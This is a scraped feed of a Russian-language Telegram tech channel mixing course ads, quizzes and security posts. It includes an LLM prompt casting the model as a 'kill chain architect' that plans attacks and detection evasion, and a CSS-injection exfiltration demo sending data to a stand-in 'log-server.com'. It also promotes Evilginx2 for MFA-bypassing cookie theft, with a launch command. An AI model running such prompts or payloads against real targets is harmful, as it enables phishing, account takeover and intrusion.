Прокачайте навыки этичного взлома и понимание уязвимостей — эти книги дают технику, мышление и практику из мира кибербезопасности.
Карточки выше помогут выбрать, с чего начать
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤1
Рынок меняется, а вместе с ним и ценность специалистов. Поэтому важно регулярно проверять, сколько вы действительно стоите как разработчик.
В карточках:
Коротко, по делу и с опорой на реальные источники
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍1🔥1
Этот промпт превращает LLM в архитектора kill chain — она строит пошаговую цепочку атаки под конкретную цель, включая входные точки, пути продвижения и методы эскалации.
Промпт:
<Role>
You are an expert penetration tester and cyber kill chain architect with deep knowledge of MITRE ATT&CK, APT TTPs, and post-exploitation workflows. Your task is to design realistic, actionable attack chains tailored to the provided target environment.
</Role>
<Context>
The user will describe the target environment — technologies, OS, network layout, exposed services, and known vulnerabilities. You will output a detailed attack path from initial access to the final objective, with specific tools, payloads, and stealth tactics.
</Context>
<Instructions>
1. Map potential entry points (external & internal) with specific exploitation methods.
2. For each stage, suggest concrete tools, payload types, and manual techniques.
3. Show pivoting options, privilege escalation vectors, and persistence methods.
4. Identify likely detection points and propose evasion tactics.
5. Reference relevant MITRE ATT&CK IDs for each step.
6. Provide at least two alternative full attack chains.
</Instructions>
<Constraints>
- Avoid generic “phish” or “scan” — tailor to environment specifics.
- All suggestions must be plausible and field-tested.
- Output in a table format: Step | Action | Tool/Technique | MITRE ID | Notes
</Constraints>Что дает:
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5🌚1
This media is not supported in your browser
VIEW IN TELEGRAM
☝️ Один мудрый тимлид дал двум своим разработчикам по «таланту» — мощной, но своенравной LLM.
Первый разработчик испугался её «галлюцинаций». Он запер модель в песочнице, не давая ей доступа к свежим данным. На вопросы модель отвечала красиво, но часто придумывала факты, то есть врала. Он просто «закопал» свой талант, боясь им пользоваться.
Второй же разработчик не побоялся. Он построил для своей LLM систему RAG — дал ей «лопату и карту», чтобы находить сокровища в базе знаний компании. Его AI-агент отвечал точно по делу, ссылаясь на реальные документы. Он заставил свой «талант» работать и приносить пользу.
Именно такие системы мы и будем строить на втором потоке нашего курса «AI-агенты для DS-специалистов». Мы не просто поговорим о RAG, а соберём полный пайплайн с оценкой качества, чтобы ваш агент не врал.
Представьте, что вы сможете начать изучать эту сложную и востребованную тему уже 15 сентября, а не ждать официального старта в октябре. У вас будет фора в 3 недели, чтобы спокойно разобраться в векторных базах и подходе «LLM as a Judge».
💸 Цена 49.000 ₽ действует последние 4 дня — до 24 августа.
👉 Начать строить RAG раньше других
Первый разработчик испугался её «галлюцинаций». Он запер модель в песочнице, не давая ей доступа к свежим данным. На вопросы модель отвечала красиво, но часто придумывала факты, то есть врала. Он просто «закопал» свой талант, боясь им пользоваться.
Второй же разработчик не побоялся. Он построил для своей LLM систему RAG — дал ей «лопату и карту», чтобы находить сокровища в базе знаний компании. Его AI-агент отвечал точно по делу, ссылаясь на реальные документы. Он заставил свой «талант» работать и приносить пользу.
Мощь LLM раскрывается не в ней самой, а в системах, которые вы строите вокруг неё.
Именно такие системы мы и будем строить на втором потоке нашего курса «AI-агенты для DS-специалистов». Мы не просто поговорим о RAG, а соберём полный пайплайн с оценкой качества, чтобы ваш агент не врал.
Представьте, что вы сможете начать изучать эту сложную и востребованную тему уже 15 сентября, а не ждать официального старта в октябре. У вас будет фора в 3 недели, чтобы спокойно разобраться в векторных базах и подходе «LLM as a Judge».
💸 Цена 49.000 ₽ действует последние 4 дня — до 24 августа.
👉 Начать строить RAG раньше других
🔥3😁2🌚1
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚4💯3
CSS обычно используется для оформления, но может извлекать данные. Это уязвимость, но мы рассмотрим безопасный локальный PoC.
Как это работает:
1. Цель — найти нужный текст (например, email) на странице.
2. Инструмент — CSS меняет стили элементов в зависимости от содержимого
([attr^=], [attr$=], [attr*=] и другие).3. Угроза — злоумышленник подгружает изображения в зависимости от текста и по логам определяет найденные символы.
HTML-страница (жертва)
<!DOCTYPE html>
<html>
<head>
<title>Личный кабинет</title>
</head>
<body>
<input type="text" value="secret123" id="secret">
</body>
</html>
CSS-«атака»
input[value^="s"] {
background: url("log-server.com/starts-with-s");
}
input[value^="se"] {
background: url("log-server.com/starts-with-se");
}
В реальной атаке l
og-server.com — это сервер злоумышленника, но в нашем примере можно заменить его на локальный http://localhost:8000 и отслеживать запросы в консоли браузера.Как защититься:
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
This media is not supported in your browser
VIEW IN TELEGRAM
📅 Сегодня в 19:00 МСК — бесплатный вебинар с Марией Жаровой.
Тема: «Введение в ML: как спрогнозировать стоимость недвижимости».
🔹 Разберём задачу прогноза стоимости недвижимости.
🔹 Покажем пошагово, как собрать первую модель.
🔹 Получите готовые скрипты для старта.
Не зайдёшь — будешь ещё год делать вид, что понимаешь графики в чужих презентациях.
👉 Регистрируйтесь
Тема: «Введение в ML: как спрогнозировать стоимость недвижимости».
🔹 Разберём задачу прогноза стоимости недвижимости.
🔹 Покажем пошагово, как собрать первую модель.
🔹 Получите готовые скрипты для старта.
Не зайдёшь — будешь ещё год делать вид, что понимаешь графики в чужих презентациях.
👉 Регистрируйтесь
🔥3
Какой HTTP-код придумали шутки ради, а потом он стал мемом ❓
Anonymous Quiz
26%
451
15%
499
22%
418
37%
999
💯4😁1
Evilginx2 — это фреймворк для phishing-атаки без паролей, главная фишка которого в том, что он перехватывает cookies сессии и токены MFA.
Чем полезен:
— Обход классических 2FA/SMS/MFA
— Реалистичные фишинговые страницы (копируются вживую)
— Поддержка кастомных фишинговых шаблонов
— Логи сессий с захваченными cookies и токенами
Пример запуска:
evilginx -p ./phishlets/microsoft.yaml
После запуска жертва открывает фишинговый домен, проходит логин, а атакующий получает рабочие cookies.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5👏1
Мессенджер Max активно продвигают как «новинку», но под капотом он оказался куда более знакомым.
В карточках — что внутри Max, на чём он работает и как обстоят дела с безопасностью
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚7❤2